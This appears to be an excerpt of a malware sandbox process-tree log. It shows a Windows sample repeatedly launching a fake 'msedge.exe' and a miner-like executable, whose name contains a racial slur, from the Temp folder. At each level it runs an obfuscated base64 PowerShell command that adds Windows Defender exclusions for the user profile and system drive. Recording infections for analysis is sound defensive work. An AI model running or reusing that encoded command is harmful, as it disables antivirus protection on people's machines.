        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        104⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        104⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        105⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        105⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        105⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        106⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        106⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        106⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        107⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        107⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        107⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        108⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        108⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        108⤵
        
        PID:1468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        109⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        109⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        109⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        110⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        110⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        110⤵
        
        PID:3236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        111⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        111⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        111⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        112⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        112⤵
        
        PID:788
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        112⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        113⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        113⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        113⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        114⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        114⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        114⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        115⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        115⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        115⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        116⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        116⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        116⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        117⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        117⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        117⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        118⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        118⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        118⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        119⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        119⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        119⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        120⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        120⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        120⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        121⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        121⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        121⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        122⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        122⤵
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        122⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        123⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        123⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        123⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        124⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        124⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        124⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        125⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        125⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        125⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        126⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        126⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        126⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        127⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        127⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        127⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        128⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        128⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        128⤵
        
        PID:1376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        129⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        129⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        129⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        130⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        130⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        130⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        131⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        131⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        131⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        132⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        132⤵
        
        PID:3620
        
